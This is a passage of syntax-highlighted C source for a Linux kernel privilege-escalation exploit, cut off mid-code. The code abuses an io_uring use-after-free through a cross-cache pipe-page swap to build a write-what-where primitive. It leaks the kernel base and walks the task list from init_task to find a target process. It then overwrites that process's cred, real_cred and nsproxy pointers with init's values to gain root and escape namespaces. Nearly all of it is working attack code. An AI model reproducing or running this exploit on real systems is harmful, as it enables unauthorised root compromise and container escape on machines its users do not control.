    <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">cached_ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="n">cqe_cached</span><span class="p">];</span>
    <span class="o">*</span><span class="n">cached_ptr</span> <span class="o">=</span> <span class="n">NULL_MEM</span><span class="p">;</span>

    <span class="c1">// Set ctx-&gt;cqe_sentinel</span>
    <span class="kt">size_t</span> <span class="n">cqe_sentinel</span> <span class="o">=</span> <span class="n">g_scratch</span> <span class="o">+</span> <span class="mh">0x248</span><span class="p">;</span>
    <span class="n">cqe_sentinel</span> <span class="o">&amp;=</span> <span class="mh">0xFFF</span><span class="p">;</span>
    <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">sentinel_ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="n">cqe_sentinel</span><span class="p">];</span>

    <span class="c1">// We need ctx-&gt;cqe_cached &lt; ctx-&gt;cqe_sentinel</span>
    <span class="o">*</span><span class="n">sentinel_ptr</span> <span class="o">=</span> <span class="n">NULL_MEM</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span>

    <span class="c1">// Set ctx-&gt;rings so that the write to ctx-&gt;rings-&gt;cq.tail lands on `where`.</span>
    <span class="c1">// cq.tail sits at offset 0xc0 from the rings base, hence the subtraction</span>
    <span class="kt">size_t</span> <span class="n">rings</span> <span class="o">=</span> <span class="n">g_scratch</span> <span class="o">+</span> <span class="mh">0x10</span><span class="p">;</span>
    <span class="n">rings</span> <span class="o">&amp;=</span> <span class="mh">0xFFF</span><span class="p">;</span>
    <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">rings_ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="n">rings</span><span class="p">];</span>
    <span class="o">*</span><span class="n">rings_ptr</span> <span class="o">=</span> <span class="n">where</span> <span class="o">-</span> <span class="mh">0xc0</span><span class="p">;</span>

    <span class="c1">// Set ctx-&gt;cached_cq_tail which is our what</span>
    <span class="kt">size_t</span> <span class="n">cq_tail</span> <span class="o">=</span> <span class="n">g_scratch</span> <span class="o">+</span> <span class="mh">0x250</span><span class="p">;</span>
    <span class="n">cq_tail</span> <span class="o">&amp;=</span> <span class="mh">0xFFF</span><span class="p">;</span>
    <span class="kt">uint32_t</span> <span class="o">*</span><span class="n">cq_tail_ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint32_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="n">cq_tail</span><span class="p">];</span>
    <span class="o">*</span><span class="n">cq_tail_ptr</span> <span class="o">=</span> <span class="n">what</span><span class="p">;</span>

    <span class="c1">// Point the ctx-&gt;cq_wait list head at itself (so that it's "empty")</span>
    <span class="kt">size_t</span> <span class="n">real_cq_wait</span> <span class="o">=</span> <span class="n">g_scratch</span> <span class="o">+</span> <span class="mh">0x268</span><span class="p">;</span>
    <span class="kt">size_t</span> <span class="n">cq_wait</span> <span class="o">=</span> <span class="p">(</span><span class="n">real_cq_wait</span> <span class="o">&amp;</span> <span class="mh">0xFFF</span><span class="p">);</span>
    <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">cq_wait_ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="n">cq_wait</span><span class="p">];</span>
    <span class="o">*</span><span class="n">cq_wait_ptr</span> <span class="o">=</span> <span class="n">real_cq_wait</span><span class="p">;</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">write_what_where</span><span class="p">(</span><span class="kt">uint32_t</span> <span class="n">what</span><span class="p">,</span> <span class="kt">uint64_t</span> <span class="n">where</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// Reset the page contents</span>
    <span class="n">reset_pipe_buf</span><span class="p">();</span>

    <span class="c1">// Setup the fake file target ctx</span>
    <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">4096</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
    <span class="n">write_setup_ctx</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="n">what</span><span class="p">,</span> <span class="n">where</span><span class="p">);</span>

    <span class="c1">// Set contents</span>
    <span class="n">write</span><span class="p">(</span><span class="n">g_pipe</span><span class="p">.</span><span class="n">fd</span><span class="p">[</span><span class="n">PIPE_WRITE</span><span class="p">],</span> <span class="n">buf</span><span class="p">,</span> <span class="mi">4096</span><span class="p">);</span>

    <span class="c1">// Get an sqe</span>
    <span class="k">struct</span> <span class="n">io_uring_sqe</span> <span class="o">*</span><span class="n">sqe</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
    <span class="n">sqe</span> <span class="o">=</span> <span class="n">io_uring_get_sqe</span><span class="p">(</span><span class="o">&amp;</span><span class="n">g_ring</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">sqe</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"`io_uring_get_sqe()` failed"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Set values</span>
    <span class="n">sqe</span><span class="o">-&gt;</span><span class="n">opcode</span> <span class="o">=</span> <span class="n">IORING_OP_MSG_RING</span><span class="p">;</span>
    <span class="n">sqe</span><span class="o">-&gt;</span><span class="n">fd</span> <span class="o">=</span> <span class="n">g_uaf_fd</span><span class="p">;</span>

    <span class="kt">int</span> <span class="n">ret</span> <span class="o">=</span> <span class="n">io_uring_submit</span><span class="p">(</span><span class="o">&amp;</span><span class="n">g_ring</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">ret</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"`io_uring_submit()` failed"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Wait for the completion</span>
    <span class="k">struct</span> <span class="n">io_uring_cqe</span> <span class="o">*</span><span class="n">cqe</span><span class="p">;</span>
    <span class="n">ret</span> <span class="o">=</span> <span class="n">io_uring_wait_cqe</span><span class="p">(</span><span class="o">&amp;</span><span class="n">g_ring</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">cqe</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// So in this kernel code path, after we're done with our write-what-where, the </span>
<span class="c1">// what value actually gets incremented ++ style, so we have to decrement</span>
<span class="c1">// the values by one each time.</span>
<span class="c1">// Also, we only have a 4 byte write ability so we have to split up the 8 bytes</span>
<span class="c1">// into 2 separate writes</span>
<span class="kt">void</span> <span class="nf">overwrite_cred</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="kt">uint32_t</span> <span class="n">val_1</span> <span class="o">=</span> <span class="n">g_cred_what</span> <span class="o">&amp;</span> <span class="mh">0xFFFFFFFF</span><span class="p">;</span>
    <span class="kt">uint32_t</span> <span class="n">val_2</span> <span class="o">=</span> <span class="p">(</span><span class="n">g_cred_what</span> <span class="o">&gt;&gt;</span> <span class="mi">32</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0xFFFFFFFF</span><span class="p">;</span>

    <span class="n">write_what_where</span><span class="p">(</span><span class="n">val_1</span> <span class="o">-</span> <span class="mi">1</span><span class="p">,</span> <span class="n">g_cred_where</span><span class="p">);</span>
    <span class="n">write_what_where</span><span class="p">(</span><span class="n">val_2</span> <span class="o">-</span> <span class="mi">1</span><span class="p">,</span> <span class="n">g_cred_where</span> <span class="o">+</span> <span class="mh">0x4</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">overwrite_real_cred</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="kt">uint32_t</span> <span class="n">val_1</span> <span class="o">=</span> <span class="n">g_cred_what</span> <span class="o">&amp;</span> <span class="mh">0xFFFFFFFF</span><span class="p">;</span>
    <span class="kt">uint32_t</span> <span class="n">val_2</span> <span class="o">=</span> <span class="p">(</span><span class="n">g_cred_what</span> <span class="o">&gt;&gt;</span> <span class="mi">32</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0xFFFFFFFF</span><span class="p">;</span>

    <span class="n">write_what_where</span><span class="p">(</span><span class="n">val_1</span> <span class="o">-</span> <span class="mi">1</span><span class="p">,</span> <span class="n">g_real_cred_where</span><span class="p">);</span>
    <span class="n">write_what_where</span><span class="p">(</span><span class="n">val_2</span> <span class="o">-</span> <span class="mi">1</span><span class="p">,</span> <span class="n">g_real_cred_where</span> <span class="o">+</span> <span class="mh">0x4</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">overwrite_nsproxy</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="kt">uint32_t</span> <span class="n">val_1</span> <span class="o">=</span> <span class="n">g_nsproxy_what</span> <span class="o">&amp;</span> <span class="mh">0xFFFFFFFF</span><span class="p">;</span>
    <span class="kt">uint32_t</span> <span class="n">val_2</span> <span class="o">=</span> <span class="p">(</span><span class="n">g_nsproxy_what</span> <span class="o">&gt;&gt;</span> <span class="mi">32</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0xFFFFFFFF</span><span class="p">;</span>

    <span class="n">write_what_where</span><span class="p">(</span><span class="n">val_1</span> <span class="o">-</span> <span class="mi">1</span><span class="p">,</span> <span class="n">g_nsproxy_where</span><span class="p">);</span>
    <span class="n">write_what_where</span><span class="p">(</span><span class="n">val_2</span> <span class="o">-</span> <span class="mi">1</span><span class="p">,</span> <span class="n">g_nsproxy_where</span> <span class="o">+</span> <span class="mh">0x4</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Try to fuzzily validate leaked task addresses lol</span>
<span class="kt">int</span> <span class="nf">task_valid</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="n">task</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">if</span> <span class="p">((</span><span class="kt">uint16_t</span><span class="p">)(</span><span class="n">task</span> <span class="o">&gt;&gt;</span> <span class="mi">48</span><span class="p">)</span> <span class="o">==</span> <span class="mh">0xFFFF</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="mi">1</span><span class="p">;</span> <span class="p">}</span>
    <span class="k">else</span> <span class="p">{</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> 
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">traverse_tasks</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>    
    <span class="c1">// Process name buf</span>
    <span class="kt">char</span> <span class="n">current_comm</span><span class="p">[</span><span class="mi">16</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>

    <span class="c1">// Get the next task after init</span>
    <span class="kt">uint64_t</span> <span class="n">current_next</span> <span class="o">=</span> <span class="n">read_8_at</span><span class="p">(</span><span class="n">g_init_task</span> <span class="o">+</span> <span class="n">TASKS_NEXT_OFF</span><span class="p">);</span>
    <span class="kt">uint64_t</span> <span class="n">current</span> <span class="o">=</span> <span class="n">current_next</span> <span class="o">-</span> <span class="n">TASKS_NEXT_OFF</span><span class="p">;</span>

    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">task_valid</span><span class="p">(</span><span class="n">current</span><span class="p">))</span>
    <span class="p">{</span> 
        <span class="n">err</span><span class="p">(</span><span class="s">"Invalid task after init: 0x%lx"</span><span class="p">,</span> <span class="n">current</span><span class="p">);</span>    
    <span class="p">}</span>

    <span class="c1">// Read the comm</span>
    <span class="n">read_comm_at</span><span class="p">(</span><span class="n">current</span> <span class="o">+</span> <span class="n">COMM_OFF</span><span class="p">,</span> <span class="n">current_comm</span><span class="p">);</span>
    <span class="c1">//printf("    - Address: 0x%lx, Name: '%s'\n", current, current_comm);</span>

    <span class="c1">// Traverse the list for as long as the task pointer looks valid</span>
    <span class="k">while</span> <span class="p">(</span><span class="n">task_valid</span><span class="p">(</span><span class="n">current</span><span class="p">))</span>
    <span class="p">{</span>
        <span class="n">current_next</span> <span class="o">=</span> <span class="n">read_8_at</span><span class="p">(</span><span class="n">current_next</span><span class="p">);</span>
        <span class="n">current</span> <span class="o">=</span> <span class="n">current_next</span> <span class="o">-</span> <span class="n">TASKS_NEXT_OFF</span><span class="p">;</span>

        <span class="k">if</span> <span class="p">(</span><span class="n">current</span> <span class="o">==</span> <span class="n">g_init_task</span><span class="p">)</span> <span class="p">{</span> <span class="k">break</span><span class="p">;</span> <span class="p">}</span>

        <span class="c1">// Read the comm</span>
        <span class="n">read_comm_at</span><span class="p">(</span><span class="n">current</span> <span class="o">+</span> <span class="n">COMM_OFF</span><span class="p">,</span> <span class="n">current_comm</span><span class="p">);</span>
        <span class="c1">//printf("    - Address: 0x%lx, Name: '%s'\n", current, current_comm);</span>

        <span class="c1">// If we find the target comm, save it</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">strcmp</span><span class="p">(</span><span class="n">current_comm</span><span class="p">,</span> <span class="n">TARGET_TASK</span><span class="p">))</span>
        <span class="p">{</span>
            <span class="n">g_target_task</span> <span class="o">=</span> <span class="n">current</span><span class="p">;</span>
        <span class="p">}</span>

        <span class="c1">// If we find our own comm, save it</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">strcmp</span><span class="p">(</span><span class="n">current_comm</span><span class="p">,</span> <span class="n">OUR_TASK</span><span class="p">))</span>
        <span class="p">{</span>
            <span class="n">g_our_task</span> <span class="o">=</span> <span class="n">current</span><span class="p">;</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">find_pipe_buf_addr</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// Get the base of the files array</span>
    <span class="kt">uint64_t</span> <span class="n">files_ptr</span> <span class="o">=</span> <span class="n">read_8_at</span><span class="p">(</span><span class="n">g_file_array</span><span class="p">);</span>
    
    <span class="c1">// Adjust the files_ptr to point to our fd in the array</span>
    <span class="n">files_ptr</span> <span class="o">+=</span> <span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span> <span class="o">*</span> <span class="n">g_uaf_fd</span><span class="p">);</span>

    <span class="c1">// Get the address of our UAF file struct</span>
    <span class="kt">uint64_t</span> <span class="n">curr_file</span> <span class="o">=</span> <span class="n">read_8_at</span><span class="p">(</span><span class="n">files_ptr</span><span class="p">);</span>

    <span class="c1">// Calculate the offset</span>
    <span class="n">g_off</span> <span class="o">=</span> <span class="n">curr_file</span> <span class="o">&amp;</span> <span class="mh">0xFFF</span><span class="p">;</span>

    <span class="c1">// Set the globals</span>
    <span class="n">g_file_addr</span> <span class="o">=</span> <span class="n">curr_file</span><span class="p">;</span>
    <span class="n">g_pipe_buf</span> <span class="o">=</span> <span class="n">g_file_addr</span> <span class="o">-</span> <span class="n">g_off</span><span class="p">;</span>

    <span class="k">return</span><span class="p">;</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">make_ring_copy</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// Get the base of the files array</span>
    <span class="kt">uint64_t</span> <span class="n">files_ptr</span> <span class="o">=</span> <span class="n">read_8_at</span><span class="p">(</span><span class="n">g_file_array</span><span class="p">);</span>
    
    <span class="c1">// Adjust the files_ptr to point to our ring fd in the array</span>
    <span class="n">files_ptr</span> <span class="o">+=</span> <span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span> <span class="o">*</span> <span class="n">g_ring</span><span class="p">.</span><span class="n">ring_fd</span><span class="p">);</span>

    <span class="c1">// Get the address of the ring's file struct</span>
    <span class="kt">uint64_t</span> <span class="n">curr_file</span> <span class="o">=</span> <span class="n">read_8_at</span><span class="p">(</span><span class="n">files_ptr</span><span class="p">);</span>

    <span class="c1">// Copy all the data into the buffer</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">size_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">32</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">val_ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">g_ring_copy</span><span class="p">[</span><span class="n">i</span> <span class="o">*</span> <span class="mi">8</span><span class="p">];</span>
        <span class="o">*</span><span class="n">val_ptr</span> <span class="o">=</span> <span class="n">read_8_at</span><span class="p">(</span><span class="n">curr_file</span> <span class="o">+</span> <span class="p">(</span><span class="n">i</span> <span class="o">*</span> <span class="mi">8</span><span class="p">));</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c1">// Here, all we're doing is determining which side of the page the UAF file is on,</span>
<span class="c1">// if it's on the front half of the page, the back half is our scratch space</span>
<span class="c1">// and vice versa</span>
<span class="kt">void</span> <span class="nf">set_scratch_space</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="n">g_scratch</span> <span class="o">=</span> <span class="n">g_pipe_buf</span><span class="p">;</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">g_off</span> <span class="o">&lt;</span> <span class="mh">0x500</span><span class="p">)</span> <span class="p">{</span> <span class="n">g_scratch</span> <span class="o">+=</span> <span class="mh">0x500</span><span class="p">;</span> <span class="p">}</span>
<span class="p">}</span>

<span class="c1">// We failed the cross-cache stage, either because we didn't replace the UAF object</span>
<span class="kt">void</span> <span class="nf">cc_fail</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="n">cc_reset</span><span class="p">();</span>
    <span class="n">close</span><span class="p">(</span><span class="n">g_uaf_fd</span><span class="p">);</span>
    <span class="n">g_uaf_fd</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
    <span class="n">release_pipe</span><span class="p">();</span>
    <span class="n">create_pipe</span><span class="p">();</span>
    <span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">write_pipe</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">char</span> <span class="o">*</span><span class="n">buf</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">write</span><span class="p">(</span><span class="n">g_pipe</span><span class="p">.</span><span class="n">fd</span><span class="p">[</span><span class="n">PIPE_WRITE</span><span class="p">],</span> <span class="n">buf</span><span class="p">,</span> <span class="mi">4096</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"`write()` failed"</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">argv</span><span class="p">[])</span>
<span class="p">{</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Setting up exploit environment..."</span><span class="p">);</span>
    <span class="n">setup_env</span><span class="p">();</span>

    <span class="c1">// Create a debug buffer</span>
    <span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">4096</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
    <span class="n">memset</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="sc">'A'</span><span class="p">,</span> <span class="mi">4096</span><span class="p">);</span> 

<span class="nl">retry_cc:</span>
    <span class="c1">// Do cross-cache attempt</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Attempting cross-cache..."</span><span class="p">);</span>
    <span class="n">do_cc</span><span class="p">();</span>

    <span class="c1">// Replace UAF file (and page) with pipe page</span>
    <span class="n">write_pipe</span><span class="p">(</span><span class="n">buf</span><span class="p">);</span>

    <span class="c1">// Try to `lseek()` which should fail if we succeeded</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">lseek</span><span class="p">(</span><span class="n">g_uaf_fd</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">SEEK_SET</span><span class="p">)</span> <span class="o">!=</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"[!] Cross-cache failed, retrying...\n"</span><span class="p">);</span>
        <span class="n">cc_fail</span><span class="p">();</span>
        <span class="k">goto</span> <span class="n">retry_cc</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// Success</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Cross-cache succeeded"</span><span class="p">);</span>
    <span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>

    <span class="c1">// Leak the `error_entry` pointer</span>
    <span class="kt">uint64_t</span> <span class="n">error_entry</span> <span class="o">=</span> <span class="n">read_8_at</span><span class="p">(</span><span class="n">ERROR_ENTRY_ADDR</span><span class="p">);</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Leaked `error_entry` address: 0x%lx"</span><span class="p">,</span> <span class="n">error_entry</span><span class="p">);</span>

    <span class="c1">// Make sure it seems kernel-ish</span>
    <span class="k">if</span> <span class="p">((</span><span class="kt">uint16_t</span><span class="p">)(</span><span class="n">error_entry</span> <span class="o">&gt;&gt;</span> <span class="mi">48</span><span class="p">)</span> <span class="o">!=</span> <span class="mh">0xFFFF</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Weird `error_entry` address: 0x%lx"</span><span class="p">,</span> <span class="n">error_entry</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Set kernel base</span>
    <span class="n">g_kern_base</span> <span class="o">=</span> <span class="n">error_entry</span> <span class="o">-</span> <span class="n">EE_OFF</span><span class="p">;</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Kernel base: 0x%lx"</span><span class="p">,</span> <span class="n">g_kern_base</span><span class="p">);</span>

    <span class="c1">// Read 8 bytes at that address and see if they match our signature</span>
    <span class="kt">uint64_t</span> <span class="n">sig</span> <span class="o">=</span> <span class="n">read_8_at</span><span class="p">(</span><span class="n">g_kern_base</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">sig</span> <span class="o">!=</span> <span class="n">KERNEL_SIGNATURE</span><span class="p">)</span> 
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Bad kernel signature: 0x%lx"</span><span class="p">,</span> <span class="n">sig</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Set init_task</span>
    <span class="n">g_init_task</span> <span class="o">=</span> <span class="n">g_kern_base</span> <span class="o">+</span> <span class="n">INIT_OFF</span><span class="p">;</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"init_task @ 0x%lx"</span><span class="p">,</span> <span class="n">g_init_task</span><span class="p">);</span>

    <span class="c1">// Get the cred and nsproxy values</span>
    <span class="n">g_cred_what</span> <span class="o">=</span> <span class="n">read_8_at</span><span class="p">(</span><span class="n">g_init_task</span> <span class="o">+</span> <span class="n">CRED_OFF</span><span class="p">);</span>
    <span class="n">g_nsproxy_what</span> <span class="o">=</span> <span class="n">read_8_at</span><span class="p">(</span><span class="n">g_init_task</span> <span class="o">+</span> <span class="n">NSPROXY_OFF</span><span class="p">);</span>

    <span class="k">if</span> <span class="p">((</span><span class="kt">uint16_t</span><span class="p">)(</span><span class="n">g_cred_what</span> <span class="o">&gt;&gt;</span> <span class="mi">48</span><span class="p">)</span> <span class="o">!=</span> <span class="mh">0xFFFF</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Weird init-&gt;cred value: 0x%lx"</span><span class="p">,</span> <span class="n">g_cred_what</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="k">if</span> <span class="p">((</span><span class="kt">uint16_t</span><span class="p">)(</span><span class="n">g_nsproxy_what</span> <span class="o">&gt;&gt;</span> <span class="mi">48</span><span class="p">)</span> <span class="o">!=</span> <span class="mh">0xFFFF</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Weird init-&gt;nsproxy value: 0x%lx"</span><span class="p">,</span> <span class="n">g_nsproxy_what</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="n">info</span><span class="p">(</span><span class="s">"init cred address: 0x%lx"</span><span class="p">,</span> <span class="n">g_cred_what</span><span class="p">);</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"init nsproxy address: 0x%lx"</span><span class="p">,</span> <span class="n">g_nsproxy_what</span><span class="p">);</span>

    <span class="c1">// Traverse the tasks list</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Traversing tasks linked list..."</span><span class="p">);</span>
    <span class="n">traverse_tasks</span><span class="p">();</span>

    <span class="c1">// Check to see if we succeeded</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">g_target_task</span><span class="p">)</span> <span class="p">{</span> <span class="n">err</span><span class="p">(</span><span class="s">"Unable to find target task!"</span><span class="p">);</span> <span class="p">}</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">g_our_task</span><span class="p">)</span>    <span class="p">{</span> <span class="n">err</span><span class="p">(</span><span class="s">"Unable to find our task!"</span><span class="p">);</span> <span class="p">}</span>

    <span class="c1">// We found the target task</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Found '%s' task @ 0x%lx"</span><span class="p">,</span> <span class="n">TARGET_TASK</span><span class="p">,</span> <span class="n">g_target_task</span><span class="p">);</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Found '%s' task @ 0x%lx"</span><span class="p">,</span> <span class="n">OUR_TASK</span><span class="p">,</span> <span class="n">g_our_task</span><span class="p">);</span>

    <span class="c1">// Set where gadgets</span>
    <span class="n">g_cred_where</span> <span class="o">=</span> <span class="n">g_target_task</span> <span class="o">+</span> <span class="n">CRED_OFF</span><span class="p">;</span>
    <span class="n">g_real_cred_where</span> <span class="o">=</span> <span class="n">g_target_task</span> <span class="o">+</span> <span class="n">REAL_CRED_OFF</span><span class="p">;</span>
    <span class="n">g_nsproxy_where</span> <span class="o">=</span> <span class="n">g_target_task</span> <span class="o">+</span> <span class="n">NSPROXY_OFF</span><span class="p">;</span>

    <span class="n">info</span><span class="p">(</span><span class="s">"Target cred @ 0x%lx"</span><span class="p">,</span> <span class="n">g_cred_where</span><span class="p">);</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Target real_cred @ 0x%lx"</span><span class="p">,</span> <span class="n">g_real_cred_where</span><span class="p">);</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Target nsproxy @ 0x%lx"</span><span class="p">,</span> <span class="n">g_nsproxy_where</span><span class="p">);</span>

    <span class="c1">// Locate our file descriptor table</span>
    <span class="n">g_files</span> <span class="o">=</span> <span class="n">g_our_task</span> <span class="o">+</span> <span class="n">FILES_OFF</span><span class="p">;</span>
    <span class="n">g_fdt</span> <span class="o">=</span> <span class="n">read_8_at</span><span class="p">(</span><span class="n">g_files</span><span class="p">)</span> <span class="o">+</span> <span class="n">FDT_OFF</span><span class="p">;</span>
    <span class="n">g_file_array</span> <span class="o">=</span> <span class="n">read_8_at</span><span class="p">(</span><span class="n">g_fdt</span><span class="p">)</span> <span class="o">+</span> <span class="n">FD_ARRAY_OFF</span><span class="p">;</span>

    <span class="n">info</span><span class="p">(</span><span class="s">"Our files @ 0x%lx"</span><span class="p">,</span> <span class="n">g_files</span><span class="p">);</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Our file descriptor table @ 0x%lx"</span><span class="p">,</span> <span class="n">g_fdt</span><span class="p">);</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Our file array @ 0x%lx"</span><span class="p">,</span> <span class="n">g_file_array</span><span class="p">);</span>

    <span class="c1">// Find our pipe address</span>
    <span class="n">find_pipe_buf_addr</span><span class="p">();</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"UAF file addr: 0x%lx"</span><span class="p">,</span> <span class="n">g_file_addr</span><span class="p">);</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Pipe buffer addr: 0x%lx"</span><span class="p">,</span> <span class="n">g_pipe_buf</span><span class="p">);</span>

    <span class="c1">// Set the global scratch space side of the page</span>
    <span class="n">set_scratch_space</span><span class="p">();</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Scratch space base @ 0x%lx"</span><span class="p">,</span> <span class="n">g_scratch</span><span class="p">);</span>

    <span class="c1">// Make a copy of our real io_uring file descriptor since we need to fake</span>
    <span class="c1">// one</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Making copy of legitimate io_uring fd..."</span><span class="p">);</span>
    <span class="n">make_ring_copy</span><span class="p">();</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Copy done"</span><span class="p">);</span>

    <span class="c1">// Overwrite our task's cred with init's</span>
